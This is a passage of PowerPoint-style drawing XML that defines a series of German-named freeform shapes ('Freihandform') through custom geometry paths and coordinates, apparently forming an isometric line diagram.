                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28742D3-59E8-4A12-BC28-052CA6862770}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11044341" y="2781441"/>
              <a:ext cx="236474" cy="136432"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY0" fmla="*/ -2878 h 55371"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY1" fmla="*/ 52493 h 55371"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95973" h="55371">
                  <a:moveTo>
                    <a:pt x="1" y="-2878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="52493"/>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96" name="Freihandform: Form 195">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6715DA-9F10-421D-82F7-57F3BB191044}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8679158" y="1141853"/>
              <a:ext cx="709544" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ 107923 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 98537 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ -1488 h 110935"/>
                <a:gd name="connsiteX2" fmla="*/ 95994 w 287969"/>
                <a:gd name="connsiteY2" fmla="*/ -3012 h 110935"/>
                <a:gd name="connsiteX3" fmla="*/ 95908 w 287969"/>
                <a:gd name="connsiteY3" fmla="*/ -2917 h 110935"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY4" fmla="*/ 52455 h 110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69" h="110935">
                  <a:moveTo>
                    <a:pt x="287970" y="107923"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="98537" y="-1488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95994" y="-3012"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95946" y="-3012"/>
                    <a:pt x="95908" y="-2917"/>
                    <a:pt x="95908" y="-2917"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="52455"/>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97" name="Freihandform: Form 196">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07909708-8033-4860-9101-4F60523DA6B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915706" y="1004712"/>
              <a:ext cx="236474" cy="137141"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY0" fmla="*/ 52630 h 55659"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY1" fmla="*/ -3029 h 55659"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95973" h="55659">
                  <a:moveTo>
                    <a:pt x="95975" y="52630"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3029"/>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199" name="Freihandform: Form 198">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E18668A-00B2-4010-9F6A-C3AAD148F7B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9152251" y="1551868"/>
              <a:ext cx="233142" cy="134557"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 94621"/>
                <a:gd name="connsiteY0" fmla="*/ 51627 h 54610"/>
                <a:gd name="connsiteX1" fmla="*/ 94623 w 94621"/>
                <a:gd name="connsiteY1" fmla="*/ -2983 h 54610"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="94621" h="54610">
                  <a:moveTo>
                    <a:pt x="1" y="51627"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="94623" y="-2983"/>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270" name="Freihandform: Form 269">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{272AA2BD-3A07-4712-BD0B-8DFAEA3D124E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4185461" y="595404"/>
              <a:ext cx="236427" cy="273102"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95954"/>
                <a:gd name="connsiteY0" fmla="*/ 107782 h 110839"/>
                <a:gd name="connsiteX1" fmla="*/ 95956 w 95954"/>
                <a:gd name="connsiteY1" fmla="*/ 52313 h 110839"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95954"/>
                <a:gd name="connsiteY2" fmla="*/ -3058 h 110839"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 95954"/>
                <a:gd name="connsiteY3" fmla="*/ 107782 h 110839"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95954" h="110839">
                  <a:moveTo>
                    <a:pt x="1" y="107782"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95956" y="52313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="107782"/>
                  </a:lnTo>
                  <a:close/>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16" name="Freihandform: Form 315">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F508809-42BF-46BD-9FB7-7DABF422079A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604316" y="1688538"/>
              <a:ext cx="23469" cy="23469"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ -2977 h 9525"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -2977 h 9525"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="9525">
                  <a:moveTo>
                    <a:pt x="1" y="-2977"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2977"/>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18" name="Freihandform: Form 317">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D740FBA9-3D26-40CC-8E53-BE4E8F84F714}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7733069" y="48719"/>
              <a:ext cx="236592" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY0" fmla="*/ 52268 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 96022 w 96021"/>
                <a:gd name="connsiteY1" fmla="*/ 107737 h 110842"/>
                <a:gd name="connsiteX2" fmla="*/ 95956 w 96021"/>
                <a:gd name="connsiteY2" fmla="*/ -3105 h 110842"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96021"/>
                <a:gd name="connsiteY3" fmla="*/ 52268 h 110842"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96021" h="110842">
                  <a:moveTo>
                    <a:pt x="1" y="52268"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96022" y="107737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95956" y="-3105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52268"/>
                  </a:lnTo>
                  <a:close/>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19" name="Freihandform: Form 318">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224B48F4-5055-4A59-BA2A-670661129524}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260070" y="-361059"/>
              <a:ext cx="236570" cy="819790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY0" fmla="*/ 274223 h 332713"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 96012"/>
                <a:gd name="connsiteY1" fmla="*/ 52350 h 332713"/>
                <a:gd name="connsiteX2" fmla="*/ 20 w 96012"/>
                <a:gd name="connsiteY2" fmla="*/ -3117 h 332713"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96012"/>
                <a:gd name="connsiteY3" fmla="*/ 329596 h 332713"/>
                <a:gd name="connsiteX4" fmla="*/ 96013 w 96012"/>
                <a:gd name="connsiteY4" fmla="*/ 274223 h 3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 h="332713">
                  <a:moveTo>
                    <a:pt x="96013" y="274223"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="-3117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="329596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96013" y="274223"/>
                  </a:lnTo>
                  <a:close/>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21" name="Freihandform: Form 320">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B3D6030-30BC-448E-A533-6D702292BEDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5604503" y="48719"/>
              <a:ext cx="23469" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107833 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -3105 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="107833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3105"/>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22" name="Freihandform: Form 321">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC72E131-451C-44F4-9B49-F02B152A2E1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6550336" y="48719"/>
              <a:ext cx="446" cy="1092429"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 182 w 181"/>
                <a:gd name="connsiteY0" fmla="*/ -3070 h 443364"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 181"/>
                <a:gd name="connsiteY1" fmla="*/ 440294 h 443364"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="181" h="443364">
                  <a:moveTo>
                    <a:pt x="182" y="-3070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="44029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23" name="Freihandform: Form 322">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A701C23-E7B4-4124-9189-50C628529E95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6787071" y="-771073"/>
              <a:ext cx="236520" cy="1776253"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ -3111 h 720895"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 662318 h 720895"/>
                <a:gd name="connsiteX2" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY2" fmla="*/ 717784 h 720895"/>
                <a:gd name="connsiteX3" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY3" fmla="*/ 52358 h 720895"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY4" fmla="*/ -3111 h 72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92" h="720895">
                  <a:moveTo>
                    <a:pt x="1" y="-3111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="662318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95994" y="717784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3111"/>
                  </a:lnTo>
                  <a:close/>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27" name="Freihandform: Form 326">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{573EABF8-F627-434D-8F55-6E688B1107FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6786812" y="731841"/>
              <a:ext cx="709685" cy="683351"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 288027 w 288026"/>
                <a:gd name="connsiteY0" fmla="*/ 218844 h 277339"/>
                <a:gd name="connsiteX1" fmla="*/ 288027 w 288026"/>
                <a:gd name="connsiteY1" fmla="*/ 107906 h 277339"/>
                <a:gd name="connsiteX2" fmla="*/ 96061 w 288026"/>
                <a:gd name="connsiteY2" fmla="*/ -3029 h 277339"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 288026"/>
                <a:gd name="connsiteY3" fmla="*/ 52437 h 277339"/>
                <a:gd name="connsiteX4" fmla="*/ 192072 w 288026"/>
                <a:gd name="connsiteY4" fmla="*/ 163375 h 277339"/>
                <a:gd name="connsiteX5" fmla="*/ 192082 w 288026"/>
                <a:gd name="connsiteY5" fmla="*/ 274310 h 27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26" h="277339">
                  <a:moveTo>
                    <a:pt x="288027" y="218844"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="288027" y="107906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96061" y="-3029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192072" y="163375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192082" y="27431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28" name="Freihandform: Form 327">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9101F44F-A5ED-49CB-B083-F61B29F6839A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260092" y="458731"/>
              <a:ext cx="709544" cy="409776"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ 52402 h 166308"/>
                <a:gd name="connsiteX1" fmla="*/ 191987 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ 163245 h 166308"/>
                <a:gd name="connsiteX2" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY2" fmla="*/ 107776 h 166308"/>
                <a:gd name="connsiteX3" fmla="*/ 95946 w 287969"/>
                <a:gd name="connsiteY3" fmla="*/ -3064 h 166308"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287969" h="166308">
                  <a:moveTo>
                    <a:pt x="1" y="52402"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191987" y="163245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287970" y="107776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95946" y="-306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29" name="Freihandform: Form 328">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAE93A98-F748-4377-81B6-FDD87FA5D1F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7733069" y="595404"/>
              <a:ext cx="236567" cy="1366239"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96011"/>
                <a:gd name="connsiteY0" fmla="*/ 496010 h 554490"/>
                <a:gd name="connsiteX1" fmla="*/ 10 w 96011"/>
                <a:gd name="connsiteY1" fmla="*/ 52455 h 554490"/>
                <a:gd name="connsiteX2" fmla="*/ 96013 w 96011"/>
                <a:gd name="connsiteY2" fmla="*/ -3012 h 554490"/>
                <a:gd name="connsiteX3" fmla="*/ 96013 w 96011"/>
                <a:gd name="connsiteY3" fmla="*/ 551479 h 554490"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96011" h="554490">
                  <a:moveTo>
                    <a:pt x="1" y="496010"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10" y="52455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96013" y="-3012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96013" y="551479"/>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30" name="Freihandform: Form 329">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FCA206-088A-4050-A6B7-9BAE6F4FB905}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260092" y="731841"/>
              <a:ext cx="236405" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95945"/>
                <a:gd name="connsiteY0" fmla="*/ 52414 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 95946 w 95945"/>
                <a:gd name="connsiteY1" fmla="*/ -3053 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95945" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="52414"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95946" y="-3053"/>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31" name="Freihandform: Form 330">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD5FB55-3307-4340-8784-560D06A657FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260186" y="1005182"/>
              <a:ext cx="236264" cy="136907"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95888"/>
                <a:gd name="connsiteY0" fmla="*/ 52535 h 55564"/>
                <a:gd name="connsiteX1" fmla="*/ 95889 w 95888"/>
                <a:gd name="connsiteY1" fmla="*/ -3029 h 55564"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95888" h="55564">
                  <a:moveTo>
                    <a:pt x="1" y="52535"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95889" y="-3029"/>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32" name="Freihandform: Form 331">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83455314-9C2F-4DC9-853B-A5C78C41578B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4895099" y="-87954"/>
              <a:ext cx="472928" cy="273110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191939 w 191938"/>
                <a:gd name="connsiteY0" fmla="*/ 107726 h 110842"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191938"/>
                <a:gd name="connsiteY1" fmla="*/ -3117 h 110842"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191938" h="110842">
                  <a:moveTo>
                    <a:pt x="191939" y="107726"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3117"/>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34" name="Freihandform: Form 333">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9388C88-53CE-4836-92A7-B3CC79AA7EEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6314050" y="-87954"/>
              <a:ext cx="472787" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 191881"/>
                <a:gd name="connsiteY0" fmla="*/ 107821 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 191882 w 191881"/>
                <a:gd name="connsiteY1" fmla="*/ -3117 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191881" h="110937">
                  <a:moveTo>
                    <a:pt x="1" y="107821"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="191882" y="-3117"/>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35" name="Freihandform: Form 334">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
